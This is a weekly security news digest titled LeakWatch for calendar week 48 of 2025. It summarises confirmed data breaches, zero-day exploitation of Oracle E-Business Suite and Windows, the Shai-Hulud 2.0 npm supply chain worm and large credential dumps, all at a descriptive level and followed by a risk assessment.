LeakWatch 2025 – Analysis of security incidents, data leaks and zero-day exploits in calendar week 48

The past week was characterized by an unusual accumulation of confirmed security incidents, complex data breaches and several zero-day attacks targeting both global corporations and critical infrastructure. The recurring connection between compromised third-party providers, vulnerabilities in software supply chains and insufficiently isolated analysis services is striking. The overall situation reflects a threat picture that is increasingly characterized by professional groups that use zero-days in widespread ERP systems and at the same time rely on extensive credential leaks to automate and scale attacks. The week’s analysis thus reveals a closely linked web of technical vulnerabilities, a lack of segmentation in service provider chains and the growing importance of aggregated mass data in the underground. I will certainly continue this new format (further explanation in the footer) periodically if the response is positive, because that’s what Sundays are for…

Confirmed data breaches

OpenAI has confirmed that user data was exfiltrated via the integrated analytics service Mixpanel. Affected are API customers whose names, email addresses and rough location information were exposed. Financial information and passwords were not affected, but it is still a sensitive incident because attackers can use the data to carry out targeted spear phishing. The case shows that linking analysis services to productive systems without strictly separated data flows creates considerable risks.

Coupang reports that around 33.7 million customer accounts have been compromised. The attacks are said to have taken place over several months and include names, contact information, postal addresses and parts of order histories. According to the company, payment data was not affected. At the same time, insider hypotheses are being discussed, but these have not been conclusively verified.

In the UK, fiber optic provider Brsk is investigating an incident in which over 230,000 contract and contact records have appeared on underground platforms. The data contains specific customer categorization markers, increasing the risk of credible social engineering attempts.

Asahi, a major Japanese beverage manufacturer, continues to struggle with the consequences of a ransomware attack. According to the company, more than 1.5 million customer and employee records are potentially affected, and the attackers are also said to have exfiltrated internal documents.

An extensive data leak has been confirmed for the French social security service Pajemploi, which could affect up to around 1.2 million users. The combination of identity data, bank information and social security numbers harbors considerable potential for abuse.

The Spanish airline Iberia confirmed that an extensive customer database had been compromised. The attackers are demanding a high payment in order to refrain from publishing sensitive passenger profiles. This includes names, e-mail addresses and frequent flyer account information. Payment data is not said to be affected. Despite the formal all-clear, the combination of personal contact data and status program information poses a substantial risk of targeted attacks, especially against business travelers.

Zero-day exploits

One particularly serious case concerns a zero-day vulnerability in Oracle E-Business Suite, cataloged as CVE-2025-61882. The Cl0p group used this vulnerability to attack Dartmouth College, exfiltrating around 226 GB of sensitive data. Social Security numbers, bank account information and personal files of at least 1,494 identified individuals are cited, although the actual number is likely higher. Reports suggest that the same vulnerability may have already been abused in other institutions. Due to the central role of ERP systems in critical business processes and the often delayed implementation of updates, the risk is disproportionately high, especially in organizations where release cycles are closely tied to operational processes.

At the same time, the kernel vulnerability CVE-2025-62215 in Microsoft Windows remains relevant and is already being actively used in combination with other exploits. The vulnerability enables local privilege escalation and is mainly observed in post-exploitation scenarios. The combination of moderate complexity and broad applicability in attack chains makes this vulnerability operationally significant, although it does not allow direct remote execution in isolation.

Other vulnerabilities in server firmware, WLAN drivers and GPU drivers have been addressed by Intel. There is no evidence of zero-day exploitation here, but the published patch series show the continued relevance of firmware security in heterogeneous system landscapes.

Supply chain attacks

The activities surrounding the npm worm Shai-Hulud 2.0 continue to dominate the picture. Projects affected include Postman, Zapier, ENS Domains and PostHog. The worm replicates automatically via GitHub repositories and has been identified in numerous build pipelines. The attackers provide affected packages with backdoors to exfiltrate access data and project secrets. Individual analyses indicate that parts of the malicious code were generated automatically, which increases the speed of adaptation. This assumption cannot be conclusively verified.

Another supply chain attack affects the US service provider SitusAMC, which processes mortgage and financial data for large credit institutions. As a result of an attack, sensitive information about customers of large banks may have been indirectly compromised. According to current information, banks such as JPMorgan Chase, Citibank and Morgan Stanley have not been directly infiltrated, but exposed via the service provider. This incident once again demonstrates the structural vulnerability of outsourced business processes, particularly in regulated areas such as the financial sector.

Credential dumps and major leaks

Several sources report the reappearance of gigantic password databases with a total of over 16 billion entries. These are often newly aggregated mergers of older leaks, supplemented by smaller recent outflows. Regardless of the origin, the sheer volume poses a significant risk because password reuse is still widespread in many organizations. Particularly critical is the proportion of accounts from sectors such as energy supply, administration and industry, which are also believed to be included in such dumps. Independent validation of the exact composition is not possible from publicly available information, but the risk of mass automated logins is immediately real.

Almaviva, a central IT service provider in the Italian rail sector, is affected by a very large outflow of data. Reports speak of around 2.3 terabytes of exfiltrated data with potentially security-relevant content. Due to the combination of transportation data, employee files and contract documents, there is a far-reaching potential context for misuse.

Under Armour was named by the Everest Group as the victim of a massive data leak. The volume mentioned comprises several hundred gigabytes, although the information provided by the attackers varies and the actual size has not been independently confirmed. However, some of the sample files provided point to real compromised company data.

Cross analysis of the week

This week’s interim analysis shows several recurring patterns. Third-party vendors and outsourced services remain key vulnerabilities as attacks increasingly target where organizations have implemented less rigorous protections or where complex integrations lead to dependencies that are difficult to control. The case of OpenAI and Mixpanel illustrates the risks of embedded analytics services that have not been strictly separated from identity data.

The zero-day exploitation of ERP systems by Cl0p points to a strategic evolution of attackers who focus on systems with a low update frequency in order to achieve sustained access and extensive data tapping. At the same time, the massive password collections show that scalable forms of attack remain a significant factor, even if modern systems are hardened. User accounts are increasingly being compromised via external leaks without the affected organization itself having been attacked.

In the supply chain environment, the situation is set to worsen because build pipelines and package registries are an attractive target and the automation of modern development processes leads to the very rapid spread of compromised dependencies. Overall, the threat picture is characterized more by external dependencies and less by isolated system vulnerabilities.

Technical assessment of the risks

This week’s risks can be characterized primarily by the combination of data exposure, privilege escalation and insufficiently isolated supply chains. Major data breaches at providers such as Coupang, Iberia, Pajemploi and Asahi primarily concern the confidentiality of personal data, which in many cases is entirely sufficient to enable identity theft, social engineering and targeted attacks on business travelers, bank customers or government employees. The technical risk does not arise from an immediate system takeover, but from the long-term usability of the data in downstream attack chains.

The zero-day exploitation in Oracle E-Business Suite shows how critical vulnerabilities in ERP systems are because they are deeply integrated into business processes and are rarely updated in many organizations. The escalation potential here ranges from data exfiltration and manipulation of operational processes to comprehensive persistence in critical infrastructures. The ongoing Shai Hulud attacks illustrate the inherent fragility of packet ecosystems and their associated supply chains. Manipulated dependencies can enter production systems almost unnoticed, even if developers have little direct contact with the attackers. The technical complexity of modern build pipelines favors this form of attack.

Finally, aggregated credential dumps with billions of entries increase the risks associated with authentication systems. Even strong security mechanisms fall behind if there are vulnerabilities in user behavior or identity management that allow attackers to use large-scale automated attacks.

What is LeakWatch?
As part of this project, a specially created and trained ChatGPT-based bot is used for special Internet research, which takes over the automated analysis of relevant data sources and simultaneously creates translations and text excerpts. The aim is to use primary sources that are as unadulterated as possible, which is why all links are recorded in tabular form to enable optional in-depth research by the interested reader. The automated search and extraction would only be possible with disproportionate effort without AI support, but every evaluation is carried out editorially and everything is also checked in terms of content, as the AI cannot interpret or formulate all content completely reliably. LeakWatch is designed as a periodic security and leak analysis format that is created in the style of igor’sLAB and using specific specifications. The focus is on verifiable events from primary sources, technical classification and completely neutral evaluation without the influence of already filtered secondary information from third parties.